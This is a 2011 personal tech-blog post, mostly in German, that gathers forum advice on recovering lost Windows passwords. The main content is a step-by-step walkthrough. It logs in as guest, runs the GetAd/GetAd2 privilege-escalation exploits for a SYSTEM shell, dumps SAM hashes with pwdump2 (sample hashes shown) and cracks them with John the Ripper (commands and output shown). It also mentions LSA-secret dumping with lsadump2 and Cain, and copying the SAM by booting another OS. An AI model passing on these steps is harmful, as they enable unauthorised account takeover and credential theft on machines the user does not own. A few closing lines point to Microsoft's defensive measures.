Bienvenido! - Willkommen! - Welcome!

Bitácora Técnica de Tux&Cía., Santa Cruz de la Sierra, BO
Bitácora Central: Tux&Cía.
Bitácora de Información Avanzada: Tux&Cía.-Información
May the source be with you!

Thursday, August 4, 2011

passwords lost

Inicio - ejecutar
micro$oft | /dev/null

;-)
Um ein Auslesen der Kennwörter aus der SAM(Benutzerkontendatenbank) zu verhindern, muss man diese verschlüsseln, dann funktioniert ein einfaches Auslesen mit diesen Programmen nicht mehr.
http://support.microsoft.com/kb/310105/de
==========================
Start/Ausführen
control userpasswords2
==========================
lsadump2
This is an application to dump the contents of the LSA secrets on a machine, provided you are an Administrator. It uses the same technique as pwdump2 to bypass restrictions that Microsoft added to LsaRetrievePrivateData(), which cause the original lsadump, by Paul Ashton, to fail.
Site:http://razor.bindview.com/
Source URL:files/Passwords/lsadump2/lsadump2.zip
===========================
Eben mit BruteForce.
Dazu brauchst du dann die SAM. Zu finden in: Windows\system32\config
Und dann noch ein nettes Tool zum craken  Musst ma nen bisschen über google suchen.
Bei L0pht-Crack4 gibt es glaube ich irgend so ne dumme Beschränkung.
Aber LC3 (wenn du es findest) ist bestimmt ganz gut.
Oder nimm Cain
An die Datei kommst du natürlich nicht, wenn du dich nicht anmelden kannst.
Deshalb solltest du mit einem 2. Betriebssystem booten. Entweder installierst du eins auf der gleichen Festplatte oder du baust die Festplatte in einen anderen Rechner ein.
------------------------------------
Meinst du eigentlich das richtige Administrator-Konto (Abgesicherter Modus) oder ein User mit Admin-Rechten ?
Wenn es sich bei dem Konto nicht um das Administrator-Konto des Abgesicherten Modus handelt, dann gibt es noch ein Möglichkeit (falls du noch ein User-Konto hast, unter dem man Programme ausführen darf).
Dann könntest du nämlich ein Tool wie z.B. Sechole benutzen um den aktuellen User zur Gruppe der Admins hinzuzufügen.
Dein altes Konto kannst du dann löschen wenn du willst.
Es kann aber auch sein, dass das nur unter WinNT geht. Ich bin mir da jetzt nicht so sicher. Du müsstest es einfach mal probieren.
-----------------------------------
Noch eine Möglichkeit (für den Fall, dass du noch ein User-Konto hast, mit dem du dich anmelden kannst):
LSA-Secrets auslesen. Geht viel schneller als SAM craken.
Dazu gibt es auch wieder einige Tools. lsadump2 soll wohl ganz gut sein.
Mit Cain geht es aber auch wunderbar.
Da siehst du dann dein Passwort sofort.
--------------------------------------
Oder benutze ophcrack
-------------------------------------
LSA Secrets Dumper ist Teil von Cain&Able. Das Kennwort wird in der SAM als simpler Hash-Wert gespeichert, mit einem Algorithmus wird dieser wieder in einen Bin-Wert umgewandelt und damit lässt sich das Kennwort wieder generiert.
========================
http://home.eunet.no/~pnordahl/ntpasswd/index.html
Quelle
Requirements
John the Ripper - john.exe
- Zum encrypten des verschlüsselten Passwortes
pwdump2 - pwdump2.exe
- Zeigt die Hashes aus der .sam Datei an
GetAd - GetAd.exe
- Exploit für Windows 2000 zum erlangen von root Rechten
GetAd2 - GetAd2.exe
- Exploit für Windows XP zum erlangen von root Rechten
Procedure
Sich als Gast oder mit einem anderen berechtigten Account
an das System anmelden. Wenn Windows 2000 verwendet wird,
verwenden wir GetAd.exe, wenn Windows XP verwendet wird GetAd2.exe
C:\GetAd\GetAd.exe
Es öffnet sich eine Root-Shell in dem Verzeichniss "C:\Windows\System32".
Nun wechseln wir in das Verzeichniss von "pwdump2" um
C:\pwdump2\pwdump2.exe
Pwdump2 gibt nun als Ausgabe alle auf diesem System befindlichen Accounts aus.
Ein Beispiel ist unten aufgelistet.
a503- 26:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d 16ae931b73c59d7e0c089c0:::
Administrator:500:19a2cf01594fb0f5aad3b435b51404ee :35c5f455886f2b6d8ad4696a
dbd90e3c:::
Gast:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0 d16ae931b73c59d7e0c089c0:::

DAU:1001:564eef452bb4f84a36077a718ccdf409:534e24aac :311de4afbc162e3dc652577:::
Als nächstes kopieren wir die Ausgabe. Unter Windows 2000 Links klicken und selektieren anschließend loslassen und fertig.
Unter Windows XP Rechtsklick und selektieren mit den Cursortasten anschliessend mit der Rechten Maustaste auf den Selektierten bereich klicken und fertig. Wenn dies geschehen ist fügen wir den eben kopierten Text in eine Textdatei ein und speichern sie ab. Die Textdatei benennen
wir hier pwd.txt.
Als nächstes rufen wir John the ripper auf, mit dem wir später das Passwort entschlüsseln wollen.
john
John the Ripper Version 1.6 Copyright (c) 1996-98 by Solar Designer
Usage: john [OPTIONS] [PASSWORD-FILES]
-single "single crack" mode
-wordfile:FILE -stdin wordlist mode, read words from FILE or stdin
-rules enable rules for wordlist mode
-incremental[:MODE] incremental mode [using section MODE]
-external:MODE external mode or word filter
-stdout[:LENGTH] no cracking, just write words to stdout
-restore[:FILE] restore an interrupted session [from FILE]
-session:FILE set session file name to FILE
-status[:FILE] print status of a session [from FILE]
-makechars:FILE make a charset, FILE will be overwritten
-show show cracked passwords
-test perform a benchmark
-users:[-]LOGIN|UID[,..] load this (these) user(s) only
-groups:[-]GID[,..] load users of this (these) group(s) only
-shells:[-]SHELL[,..] load users with this (these) shell(s) only
-salts:[-]COUNT load salts with at least COUNT passwords only
-format:NAME force ciphertext format NAME (DES/BSDI/MD5/BF/AFS/LM)
-savemem:LEVEL enable memory saving, at LEVEL 1..3
In diesem Beispiel benutzen wir den incremental Methode
zum Entschlüsseln unseres Passwortes.
john -i:all pwd.txt
Als Ausgabe erhalten wir in diesem Beispiel folgende,
die auch bei anderen Sessions ähnlich ist.
Loaded 3 passwords with no different salts (NT LM DES [24/32 4K])
guesses: 0 time: 0:00:00:01 c/s: 42752 trying: MMWW - BRUS
John the ripper versucht nun das Passwort zu entschlüsseln in dem es jede mögliche Kombination ausprobuiert. Je nach länge des Passwortes und Geschwindigkeit des Prozessors kann dies einige
Zeit in anspruch nehmen. Die nächsten Versuche von JTR werden vorbehalten,
mit "Enter" kann man die jeweilige Kombination die gerade probiert wird sehen.

----------
Paassword nicht ändern, nur ablesen
---------------------------------------------
Für die Zukunft auf jeden Fall machen:
Erstellung und Verwendung einer Kennwortrücksetzdiskette  für einen Computer, der nicht Mitglied einer Domäne ist
http://support.microsoft.com/default...d=kb;de;305478
Erstellen und Verwenden einer Kennwortrücksetzdiskette für einen Computer in einer Domäne
http://support.microsoft.com/default...d=kb;de;306214
==========================
All password related tools from dictionary attacks to brute force attacks

No comments: